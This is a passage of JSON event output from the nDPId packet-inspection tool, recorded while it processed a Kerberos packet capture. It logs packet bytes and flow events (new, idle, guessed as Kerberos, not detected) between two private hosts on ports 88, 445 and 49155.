00906{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1549337952273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":384,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":384,"pkt_l4_len":350,"thread_ts_msec":1549337952273,"pkt":"pB9ywglqAAgCHEeuCABFAAFyATpAAIAGj1qsEAjJrBAICMApAYWiDvrzQ6ao6FAYAQCdKwAA2XkxbZ8llDCRRskO9gczLnFPBBStfBeg8OgSpqEBOAYdhyM5RDqy\/NVC6gFAjMdVRNF4Ud\/vkuMZvi\/C9TPqJBllB8ilyB5vY\/0m8yd5y16xkjvnwbrb\/W3CqgNY3GxQ0p18n9KBChjcbfQi2adBQLNadPsG91L4HVVYSlDxeVsaDj0AMrkXgx+K3pVveifu4IJvdTmm3dssrOx7ri4BqxH9gyHnnJM+gUu5MIG+gLCwhKX1IYuuZbwXmnO9knNSHi2TJaHys\/IKitqKHwvZMTG4i5pUecWz9NSU996q6A\/\/cM86g4TCvpD7370UyqGGHaccTUUMvb5qsoRczG++plTQXQ5YE69in6j\/JeD8IrT\/3QjjRWw+cBkDPh5zGLRzdI7hQfeBq0OXmrV0OXPvzg6Pl4TznRF\/D32Q4zoFws9t5i+mUoUZd\/0N"}
00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1549337952274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337952274,"pkt":"AAgCHEeupB9ywglqCABFAAD6FAFAAIAGfQusEAgIrBAIyQGFwClDpqjoog78PVAYAQACfgAAMIQAAADMAgETYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1lU8qvBSW6OfUooizc58b3UUWb1Dc9+q1BnNlk6M5gNl0OBLUYfNGeTN7jVmkr5YZr3HGFOATkbw9DVEo286mQ0yhq4w+ZVjlShGexAg6l9M9U7cWsZU11Tj+uS9vWEh6ZGrVD7TgBU6qOlGAU"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952280,"flow_last_seen":1549337952280,"flow_idle_time":7440000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":1,"thread_ts_msec":1549337952280,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1549337952280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1549337952280,"pkt":"pB9ywglqAAgCHEeuCABFAADxAURAAIAGj9GsEAjJrBAICMArAFh+ue0Nm8k31FAYAQCDOwAAZ6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbhyIagSMBACARICARECARcCARgCAv95qoGWMIGToAMCARKigYsEgYjkLV5w61M4dBZf0U0Cc\/K54wTCl69GxhAdEJKI0gkw0Ve5ZSvbl+6jcyFmUgFhA4RyBx9pGsk\/XqrLuUXPEHyz9XOfuzdWYBvPp5yv4UFPIJKI5TMk\/2fkioL\/XfCG7Jr8xEeBwNw3Qk0PtCp3\/DDaU5\/NbtOzNRQiyiFTx75LpVnwmoKHd6R7"}
00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1549337952281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1549337952281,"pkt":"AAgCHEeupB9ywglqCABFAADbFApAAIAGfSGsEAgIrBAIyQBYwCubyT2Ifrnt1lAYAQDVagAATQg2IahlDr4Do2rw09NPfPwlJMuv1fJJCc5mjToXHNxo9crR1AT1CMr5O+bZxtqN6M9uCaNjeNur9XwIFCnpBuL05RtGDqn2i9hJpKd+E88QIO6v0xwHDv6iGr\/8TVgkK3vs2tcuY57O8+c4l9vRR7jejS5ww2dQZlIjb\/CCYROJuvRqA0LHwqGM0CcXmUposD8ISy568tJuLRICL3GBKJj5gtDiSRwMYGKFzsxgs2+QN48="}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1549337952282,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1549337952282,"pkt":"pB9ywglqAAgCHEeuCABFAABLAUpAAIAGkHGsEAjJrBAICMAsAFiP2F5aCFrVJ1AYAQB5GAAAR6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbhyJqgFMAMCARI="}
00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1549337952282,"pkt":"AAgCHEeupB9ywglqCABFAABYFBBAAIAGfZ6sEAgIrBAIyQBYwCwIWtrbj9hefVAYAQDaWgAAkAFNdIHXOvUSiNrRZ37a2E9NpclNBTiyKWuPGcwkWc2OKSpCtzAbfs9v1WRIgz2U"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"flow_min_l4_payload_len":356,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":356,"midstream":1,"thread_ts_msec":1549337952282,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00939{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":410,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":410,"pkt_l4_len":376,"thread_ts_msec":1549337952282,"pkt":"pB9ywglqAAgCHEeuCABFAAGMAVBAAIAGjyqsEAjJrBAICMAqAb0OVvT1RRDYGlAYAP+BiQAAx2oDxasXfLBTEcjz3tABELHnmrS3ZANlrcp\/hNjXtg\/fwYTBDdsdTzX+XDaW+uv3s2\/LBkJPP0K4Dy0YU3CzKo3pfb0515XvBfsBO7Ma0iP8tOV8txynjcFaEQvYkdi2SQ6bebHRRKNuECPHoWmL3h9GQAZAb4a73kOXQ+HdWdMxxkSNni5ZeogFxLOO9R2cL7EvadD9j700FIRXk1Ysly6p8QSOxUcF2BTlCAMMXraIVwnaJn4OFnBRV1kK62QzrTna4Mma6JSVzK\/6fCHORQn+FIHExUVoG3Vq1BveDwHtG0XGyIXhHabrgc6YQttz\/jzBPNDyI9ROMV3pQ0pZrTLzCjs+95mV\/WzyQTG\/SRF7u\/0NE9yZnVgk7HZw7F9bqd7MfX+aga2J6\/HQLbCChYzLyXsDW8WbBsbXh+XIiTyOIboYMLvBqY271GjiVoIyA7mbRvLsykMc7DElauDSPsA2vtc="}
00807{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1549337952283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337952283,"pkt":"AAgCHEeupB9ywglqCABFAAEsFBRAAIAGfMasEAgIrBAIyQG9wCpFENgaDlb2WVAYAP9XsAAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAEAAAAAAAAA\/\/4AAAAAAABhAAAAAAQAAFesIp3Ms9YkV3HyzmcNx+gJAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbUXiUY0MYNrse7Xdy+nvFD1NZYMmVWsdodfXY9v69kCk+MLVD1Rqj48zpMQyXFgAZRbdNaLq\/lZFH5cVcwmZOZp6PzJLHFRz2Ys9FBPKwjMkCOL5scijYfadSqIU\/eT7q\/ACDBFzzf8MmsOdu9E="}
00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1549337930219,"flow_last_seen":1549337951711,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":1682,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1549337930219,"flow_last_seen":1549337951711,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":1682,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929811,"flow_last_seen":1549337929812,"flow_idle_time":7440000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00706{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
00710{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7440000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7440000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
